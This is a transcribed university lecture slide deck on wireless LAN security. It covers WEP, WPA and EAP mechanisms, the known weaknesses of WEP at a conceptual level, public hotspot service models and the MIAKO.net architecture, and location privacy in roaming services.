![Page 1: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/1.jpg)
Wireless Network Security for Future Internet
Yasuo OkabeAcademic Center for Computing and Media Studies
Kyoto University
![Page 2: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/2.jpg)
Overview
1. What is Network Security?
2. W-LAN Security Technologies
3. Security Issues on Public Wireless Internet Access Services
4. Location Privacy
5. Summary
![Page 3: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/3.jpg)
1. What is Network Security?a brief introduction
![Page 4: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/4.jpg)
What is Network Security?
sender recipient
message
interruption eavesdropping
masquerade fabrication modification
adversary?
![Page 5: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/5.jpg)
Active Attacks and Passive Attacks
• Active attacks– Interruption
• denial of service (DoS)– Masquerade– Fabrication
• replay– Modification
• Passive Attacks– Eavesdropping (or Wiretapping)
• get the content of messages without the sender/recipient being aware of it
– Monitoring• observe who sends a message to whom at when
Passive attacks are more difficult to detect than active attacks
![Page 6: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/6.jpg)
Repudiation
• The sender denies the fact he have sent the message– The sender tells a lie.– The recipient tells a lie.– An adversary fabricated the
message.• The recipient denies the fact
she have received the message– The sender tells a lie.– The recipient tells a lie.– An adversary masqueraded as
the recipient.
• The received message is different from what is sent.– The sender tells a lie– The recipient tells a line– An adversary modified it.
senderrecipient
message
} Both
adversary?
It is meaningless one can believe firmly the opponent tells a lie but he cannot prove it to a third person.
![Page 7: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/7.jpg)
Network Security
• Attributes in Computer Security– Confidentiality– Integrity– Availability
Concealment•assure to be kept unnoticed the fact communication is done between the sender and the recipients to others
Authentication•confirm both the sender and the recipients surely have the authority to do the act a the communication
Nonrepudiation•prevent either the sender or the recipient from denying the communication
•When a message is sent, the recipient can prove that the message is sent from the sender, and vice versa.
![Page 8: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/8.jpg)
2. W-LAN Security Technologies
![Page 9: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/9.jpg)
Wireless LAN
• IEEE802.11– A set of standards for wireless local area networks
(W-LAN)– Developed by IEEE LAN/MAN Standards Committee
(IEEE802).• IEEE 802.11 (1997), 11b (1999), 11a (1999), 11g(2003)• IEEE 802.11i (2004)
• Wi-Fi (Wireless Fidelity)– A family of related specifications based on
IEEE802.11 but slightly modified.– Specified by Wi-Fi Alliance
![Page 10: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/10.jpg)
W-LAN Security
• Access Control at Access Points– Stealth ESSID
• stop announcement of ESSID (Extended Service Set ID)But, ESSID can be sniffed by monitoring.
– MAC Address Registration• deny packets from a client whose MAC addresse is not regist
erredBut, MAC addresses can be sniffed and be spoofed.
– WEP, WPA, … 〔 T.B.D. later 〕• Restriction at Access Points
– IP address restriction / port filtering– Disabling direct communication among clients
![Page 11: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/11.jpg)
WEP (Wired Equivalent Privacy)
• Authentication and Encryption by a WEP Key– 64bit WEP (40bit key + 24bit IV)– 128bit WEP (104bit key + 24bit IV)
• Two mode of authentication– Open System authentication
• No actual authentication at association, but data is encrypted by WEP key
– Shared Key authentication• Four-way challenge-response handshake at association
![Page 12: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/12.jpg)
WEP Encryption Details
WEP key
IV
Key stream
RC4
Data (plain text) ICV
CRC32
(Integrity Check Value)
XOR (exclusive OR)
Data (encrypted) ICV
(encrypted)
MAC header IV FCS (Frame Check Sum)
(Initial Vector)
IV and hence key stream are frequently changed, so as to protect against brute-force attack.
![Page 13: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/13.jpg)
Vulnerability of WEP
• Relatively shortness of IV– 224 16,000,000≒
• The same number of packets may be sent only in 10 minutes in 54Mbps W-LAN.
– Crackers can get the XOR of plain-text data if he find two frames with the same IV
• (D1+K) + (D2+K) = D1+D2, where D1 and D2 are original data and K is the key stream.
• Key remains static– sometimes yearly…
• RC4 is known to be weak.Note that cracking can be done passively
![Page 14: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/14.jpg)
Cracking Tools
• AirSnort– http://airsnort.shmoo.com/
• Aircrack-ng– http://www.aircrack-ng.org
![Page 15: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/15.jpg)
demo
![Page 16: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/16.jpg)
WPA (Wi-Fi Protected Access)
• WPA-TKIP– Improvement of WEP– Use a temporal key instead of WEP key
• Key is assigned per client, per association and periodically changed
• TKIP: Temporal Key Integrity Protocol
– Key stream is generated by RC4 from 48bit IV (initial vector)
• avoid reuse same IV.
• WPA-AES– Use of AES (Advanced Encryption Standard) instead
of RC4.
![Page 17: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/17.jpg)
WPA-PSK
• WPA-PSK (Pre-Shared Key)– Replacement of WEP
• Initial association between AP and client is done with a pass phase as a pre-shared key
• Weakness– Attacker who have the
pre-shared key can eavesdrop all packets.
– Dictionary attack may succeed if the pre-shared key is not choose enough long and not guessable.
![Page 18: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/18.jpg)
WPA-EAP
• EAP (Extensible Authentication Protocol)
• Authentication based on 802.1x with a Radius authentication server
• EAP-TLS– Based on PKI– Server and client mutually
authenticate by certificates• EAP-PEAP
– ID/Password based• Use of PKI is optional
– MS-CHAP v2• Server and client mutually
authenticate via ID/password
• EAP-SIM– Using SIM (GSM
Subscriber Identity Module)
Mobile Node
AccessPoint
CorrespondingNode
AuthenticationServer
![Page 19: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/19.jpg)
Comparison of IEEE802.1X EAP-TLS
• EAP ( Extensible Authentication Protocol)
方式 Client Authentication
Server Authentication
Security Level
Operation Cost
EAP-TLS Certificate Certificate High High
EAP-TTLS ID/Password Certificate Mid. Mid.
EAP-PEAP ID/Password Certificate Mid. Mid.
LEAP ID/Password ID/Password Low Low
EAP-MD5 ID/Password --- Low Low
![Page 20: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/20.jpg)
TARO SUZUKITARO SUZUKI 08/07
Smart CardCA Administrator
RA Administrator
RA Operator
User
RACA
Apply
IdentifyAuthorize
Issue Certificate
Application Server (web)
Admin Server (web)
Authority Delegation
Issue Request
How to use EAP-TLSbased on PKI
APRADIUSLDAP
![Page 21: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/21.jpg)
OpenWRThttp://openwrt.org/
– Alternative firmware for commodity W-LAN routers• Supports many platforms, including Buffalo’s products
– Open source based on Linux• CLI• Supports many features like 802.1x with Radius, VPN, etc.• Customizable by users themselves.
DD-WRThttp://www.dd-wrt.com/wiki/
• A branch of OpenWRT• GUI
![Page 22: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/22.jpg)
3. Security Issues on Public Wireless Internet Access Service
![Page 23: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/23.jpg)
Status of public wireless Internet access
• Remarkably rapid deployment of IEEE802.11b/g W-LAN in these 10 years – Now almost all Note PCs have W-LAN build in.– Security risks/incidents have become a social problem.
• “Public wireless LAN” or “wireless HotSpot”– Public Internet Access Service using W-LAN technology
• Attracts attention of the mass media.– In U.S.
• Bankruptcy of MobileStar (2001)– In Japan
• Paid services are not necessarily satisfactory– MIS stops the service ( 2002 )– Livedoor Wireless canceled the plan of extending the coverage– Each of NTT group company provides service in unsystematic way.
HOTSPOT (NTT.com), M-Zone (NTT DoCoMo), Wireless LAN Club (NTT BP), FletsSpot (NTT East/West)
![Page 24: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/24.jpg)
Difficulty in the business model ofpublic wireless Internet access service
• Issues in cover area– Conflict among service providers at public hot spots like
railway stations, airports, hotels• Number of channels of IEEE802.11b/g is very small
– In most places only one service available• Users who subscribes the service can use it.
– Most of the spots are located at metropolis, few in local cities.
– Covers only spots, not area• Enormous investment is needed to cover area, compared to
3G mobile phone service• Several projects conducted by local governments are
suspended in U.S.
![Page 25: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/25.jpg)
Free Wireless Services
• FON– http://www.fon.com
• Google WiFi– http://wifi.google.com
• eduroam– http://www.eduroam.org
• FreeSpot– http://www.freespot.com
![Page 26: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/26.jpg)
Google WiFi
• A free wireless Internet service in Mountain View by Google– More than 400 APs.– Service area: almost the whol
e areal of 18km2
– Unique user : 15,000/month
“We're offering to the city of Mountain View as part of our ongoing efforts to reach out to our hometown.”
http://wifi.google.com/city/mv/apmap.html
![Page 27: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/27.jpg)
eduroam
– W-LAN roaming architecture among academic and research institutes in Europe and other countries.
– IEEE802.1x (EAP-TTLS)+ raduis federation
– Roaming between commercial service providers in Europe (experimental)
![Page 28: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/28.jpg)
Is FREE service really possible?
• We already have Internet Infrastracuture.– Most of office/shops/houses have broadband access.
• ADSL (1 ~ 10Mbps) FDDH (100Mbps⇒ ~ 1Gbps)
• Providing it to visitors is feasible– We rarely consumes the bandwidth fully– Wireless service needs little cost.
• The issue is security– Risk of providing network access to unknown visitors
• Access to the private network can be prohibited but
• Malicious access to the Internet is hard to limit
![Page 29: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/29.jpg)
Security in public wireless Internet services
• What is the difference between W-LAN and public Wireless Access?– For users:
• Eavesdropping, MIM (man-in-the-middle) attack• Masquerading (Impersonation)
– For host people of access points• Accounting (in paid service only)• Avoiding anonymous use
![Page 30: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/30.jpg)
Limitation of Wireless-LAN authentication and encryption
technologies for public wireless service• Stealth ESSID?
– ESSID must be announced to public
• MAC address filtering– Can very easily be spoofed– Issues in scalability
• WEP (encryption)– Pre-shared key– The key is shared by all users
• WPA-EAP– IEEE802.1x
Cannot be used in public
services.
Encryption is done only in
Wireless section(between AP and client)
![Page 31: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/31.jpg)
ISP type W-LAN service
• Features– Centralized Management b
y ISP• Wireless AP and Access
Network are owned by ISP
• ISP manages Authentication Server and issues acounts
– Subscriber must rely on ISP• Issues
– Contract is needed between the ISP and subscribers
AS: authentication serverAP: access pointMN: mobile nodeCN: corresponding node
Mobile Node
CorrespondingNode
ISPNetwork
AccessPoint
AuthenticationServer
Data
Authorization
1. 2.
![Page 32: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/32.jpg)
Wireless Internet Service by a single ISP
MN (mobile node)
Auth Server
AP (Access Point)ISP
Internet
CN (corresponding node)
Mutual Authentication
ISP’s private network
Mutual trust relation
![Page 33: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/33.jpg)
WLAN roaming among ISPs
MN
Access pointsRoam ISP
InternetCN
Authentication
Home ISP
AAA server
(exapmple)•iPass•eduroam
Mutual trust relation
Trust relation between Home ISPAnd Roam ISP is necessary
![Page 34: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/34.jpg)
Self-managed model• Features
– Managed typically with one or a few APs, independently
• Daily operational cost is not so high.
– Security policy depends on the host person
– Grass-root deployment is possible
• Issues– Very costly to assure security l
evel as high as the user can be traced when an incident occurs.
– No protection if the host person has malicious attempt.
CorrespondingNode
Mobile Node
AccessPoint
Host person’snetwork
(1.)
2.
![Page 35: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/35.jpg)
Self-managed FreeSpot ( Free Service )
MN
AP
Internet
CN
Host person of APs
Naïve authentication
Maliciousadversary
• Eavesdrop• Masquerade• Fabrication
Repudiation
![Page 36: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/36.jpg)
Management CostHigh Low
Self-ManagedModel
ISP Model
AutonomousDistributed
Model
Framework to enhance the security of self-managed network model
Secu
rity
High
Low
Comparison of Public WLANService Models
![Page 37: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/37.jpg)
AP host’sNetwork
Network ofAuthenticationSystem Corresponding
Node
Mobile Node
Access Point
AuthenticationServer
Authentication
Data
Authorization
assuming littleconfidentiality
Autonomous Distributed Model
![Page 38: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/38.jpg)
Data PathNo Auth.
at APAuth. at
AP
Tunnel PATP RATP
Direct PADP RADP
[ Properties and Name of Each Model ]
Categorization of Security Procedures ofAutonomous Distributed Public WLAN services
• Categorize authentication mechanisms based on the following two aspects:
• Authentication Transaction at Access Point• Relayed• Passed Through
• Data Path• Tunneling• Direct
[ Pros and Cons of Four Models ]
• Authentication Treatment at AP• Relayed:
• Eliminate malformed authentication• Make an AP busier
• Data Path• Tunneling:
• Acquire location privacy of MNs• Detour via AS is forced
In the other case, pro and con go across.
![Page 39: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/39.jpg)
CorrespondingNode
Tunneling Server
AccessPoint
Mobile Node
1.
2.
Passed-through Authentication,Tunneling Path (PATP) Model
VPN Tunnel
Authentication
Data
Authorization
Tunneling &Authentication
Server
Corresponding Node
AccessPoint
Mobile Node
3.
2. (Relay of 1.)
4.
5.
1.
Relayed Authentication,Tunneling Path (RATP) Model[ ][ ]
![Page 40: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/40.jpg)
Authentication
Data
ID Info. Exchange
AuthenticationServer
CorrespondingNode
Mobile Node
AccessPoint
1.3.
2.
Passed-through Authentication,Direct Path (PADP) Model
Mobile Node
AccessPoint
CorrespondingNode
AuthenticationServer
1.
2.
3.
4.
Relayed AuthenticationDirect Path (RADP) Model[ ] [ ]
![Page 41: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/41.jpg)
Implementation in MIAKO.net
MN
AP
Internet
CN
AP hostsUsers’ ownor
By ISP
VPNserver
Mutual trust relation
Pass throughbut VPN protocols only
![Page 42: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/42.jpg)
4. Location Privacy
![Page 43: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/43.jpg)
What is Location Privacy?
• Location privacy is the combination of information of when and where you are, an
d who you are• Your location privacy is e
xpected to be disclosed to neither of– corresponding node– authentication server– access point
• Trade off with– Anonymity v.s. security– Location-aware service
CorrespondingNode
Mobile Node
Access Point
AuthenticationServer
You are here!
![Page 44: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/44.jpg)
Location privacy inISP type W-LAN service
• The authentication server knows– who you are– where you are now– To whom you are
communicating
• Users are forced to rely on the service provider– Mobile phone carriers
does. Mobile Node
CorrespondingNode
AccessPoint
AuthenticationServer
Data
Authorization
1. 2.
![Page 45: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/45.jpg)
CorrespondingNode
Mobile Node
Access Point
AuthenticationServer
Location Privacy in Roaming Service
•Authentication server knows• who you are• where you are
•Access point may know• where you are• who you are• to whom you are communicating
•Corresponding node will know• where the MN is
![Page 46: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/46.jpg)
CorrespondingNode
Mobile Node
Access Point
AuthenticationServer
How pseudonym conceals location privacyin roaming service
•Access point may know• where you are• to whom you are communicating• which is your home ISP, not who you are
•Authentication server may know
• who you are• which roam ISP you are using, not where you are
Access with pseudonym
Authentication proxy server
Home ISP
Roam ISP
![Page 47: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/47.jpg)
CorrespondingNode
Tunneling Server
AccessPoint
Mobile Node
Location privacy in VPN-basedTunneling Path Model
VPN Tunnel
Data
AuthorizationRoam ISP
Home ISP
•Authentication server knows
• who you are• where you are
•Access point cannot know
• to whom you are communicating
•Corresponding node cannot know
• where the MN is
![Page 48: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/48.jpg)
5. Summary
![Page 49: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/49.jpg)
Summary
• Security issues of W-LAN roaming services
• Proposal of autonomous distributed public wireless Internet access architecture– MIAKO.net– A service model for implementing ubiquitous n
etworking with a grass-root W-LAN roaming with enough security.
![Page 50: Wireless Network Security for Future Internet Yasuo Okabe Academic Center for Computing and Media Studies Kyoto University](https://reader033.vdocuments.site/reader033/viewer/2022051613/55148f8c550346b2598b5230/html5/thumbnails/50.jpg)
[ Concluding Remarks ]
• Categorized security problems of public WLAN services• Proposed an Autonomous Distributed public WLAN service model• Compared some security procedures of Autonomous Distributed public WLAN service
• Each procedure has its pros and cons therefore we cannot say which is the best for future use
• MIAKO.NET public wireless service• This is based on PATP model
[ References ]
• A. Balanchandran et al., ‘Wireless Hotspots: Current Challenges and Future Cirections’, 2003• N. Borisov et al., ‘(In)Security of the WEP Algorithm’, 2001• D. Golombek, ‘Single Computer Breaks 40-bit RC4 in under 8 Days’, 1996• T. Komura et al., ‘The MIAKO.NET Public Wireless Internet Service in Kyoto’, 2003• Y. Matsunaga et al., ‘Secure Authentication System for Public WLAN Roaming’, 2003• L. Ackerman et al., ‘Wireless Location Pricay: Low and Policy in the U.S., EU and Japan’,
- ISOC Member Brefing, 2003